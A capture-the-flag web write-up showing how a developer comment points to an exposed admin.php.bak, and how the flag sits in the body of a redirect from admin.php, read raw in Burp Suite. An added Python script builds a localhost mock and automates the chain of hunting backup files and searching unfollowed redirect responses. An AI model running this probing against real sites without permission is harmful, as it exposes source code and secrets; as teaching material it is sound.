Tags: web
Rating:
# **Presentation**
The objective is to find the flag hidden in the site.
# **Flaw Exploited**
The flaw exploited is in the HTTP response: the server sends back more than the page the browser renders, and the flag is in that extra content. A second flaw is a backup file left behind on the site.
# **Solution**
Looking at the source code of the site, we find a comment telling the developer not to forget to remove `admin.php.bak`.
We can therefore try to recover that backup file directly from its URL.
At the end of the PHP code in the file, we see that it runs the command
`echo flag`
So the next step is to request the original `admin.php` itself.
I personally used Burp Suite to capture the responses the server sends back.
When we request admin.php, the flag is in the raw HTTP response the site sends back, which is what Burp Suite lets us read.
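To show the whole chain end to end, here is an added Python example that is not part of the original write-up or of the challenge. It starts a constructed mock site on localhost (an index page with the developer comment, an exposed admin.php.bak, and an admin.php whose response carries the flag) and then walks the three steps against it: read the comment, fetch the backup, request the original script and search the raw response. The flag value, the page contents and the assumption that admin.php answers with a redirect whose body still contains the echoed flag (so a browser following the redirect never displays it) are all constructed for the example.

```python
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import HTTPRedirectHandler, Request, build_opener

# Constructed flag for the mock; the real challenge flag is not reproduced here.
FLAG = "flag{constructed_example_flag}"

# Constructed pages: a developer comment pointing at the backup, the backup
# showing what admin.php does, and admin.php replying with a redirect whose
# body still carries the echoed flag (assumed behaviour for the example).
INDEX_HTML = b"""<html><body><h1>Welcome</h1>
<!-- TODO for the dev: don't forget to remove admin.php.bak before release -->
</body></html>"""
ADMIN_BAK = b"""<?php
$flag = file_get_contents('/flag.txt');
header('Location: /');
echo $flag;
?>"""


class MockSite(BaseHTTPRequestHandler):
    """Minimal stand-in for the vulnerable site (constructed, localhost only)."""

    def do_GET(self):
        if self.path == "/":
            self._reply(200, INDEX_HTML)
        elif self.path == "/admin.php.bak":
            self._reply(200, ADMIN_BAK, ctype="text/plain")
        elif self.path == "/admin.php":
            self._reply(302, FLAG.encode(), extra={"Location": "/"})
        else:
            self._reply(404, b"not found")

    def _reply(self, code, body, ctype="text/html", extra=None):
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_mock():
    """Bind the mock on a free localhost port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), MockSite)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}"


class _NoRedirect(HTTPRedirectHandler):
    # Returning None makes urllib raise HTTPError instead of following 3xx,
    # so the intermediate response stays visible, as it does in a proxy.
    def redirect_request(self, *args, **kwargs):
        return None


def fetch_raw(url):
    """GET a URL and return (status, headers, body) without following redirects."""
    try:
        with build_opener(_NoRedirect).open(Request(url), timeout=5) as resp:
            return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
    except HTTPError as err:
        return err.code, dict(err.headers), err.read().decode(errors="replace")


BACKUP_SUFFIX = re.compile(r"(\.bak|\.old|\.orig|\.save|~)$")
COMMENT = re.compile(r"<!--(.*?)-->", re.S)
FILENAME = re.compile(r"[\w./-]+\.(?:php|phtml)(?:\.bak|\.old|\.orig|\.save|~)?")


def find_backup_hints(html):
    """Filenames with a backup suffix that are mentioned inside HTML comments."""
    names = []
    for comment in COMMENT.findall(html):
        names += [n for n in FILENAME.findall(comment) if BACKUP_SUFFIX.search(n)]
    return names


def find_flag(headers, body, pattern=r"[A-Za-z0-9_]+\{[^}]+\}"):
    """Search headers and body together: a leaked flag may sit in either."""
    haystack = "\n".join(f"{k}: {v}" for k, v in headers.items()) + "\n" + body
    match = re.search(pattern, haystack)
    return match.group(0) if match else None


def solve(base):
    """Comment -> backup file -> original script -> raw response, as in the write-up."""
    _, _, index = fetch_raw(base + "/")
    for bak in find_backup_hints(index):
        status, _, source = fetch_raw(f"{base}/{bak.lstrip('/')}")
        if status != 200:
            continue
        print(f"[+] {bak} is exposed:\n{source}")
        original = BACKUP_SUFFIX.sub("", bak)
        status, headers, body = fetch_raw(f"{base}/{original.lstrip('/')}")
        print(f"[+] {original} answered {status}; flag in raw response?")
        flag = find_flag(headers, body)
        if flag:
            return flag
    return None


if __name__ == "__main__":
    server, base = start_mock()
    try:
        print("flag:", solve(base))
    finally:
        server.shutdown()
```

Run it as a script to see the exposed backup and the captured response. Against a real target you would point solve() at the site's base URL; fetch_raw deliberately does not follow redirects, so the response a browser would silently skip past is the one that gets searched, much like reading it in Burp Suite's HTTP history.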
If you liked this writeup you can check our github with this [link](https://github.com/PoCInnovation/ReblochonWriteups/tree/master/PicoCTF2021) and star our repository.
Team Reblochon, HeroCTF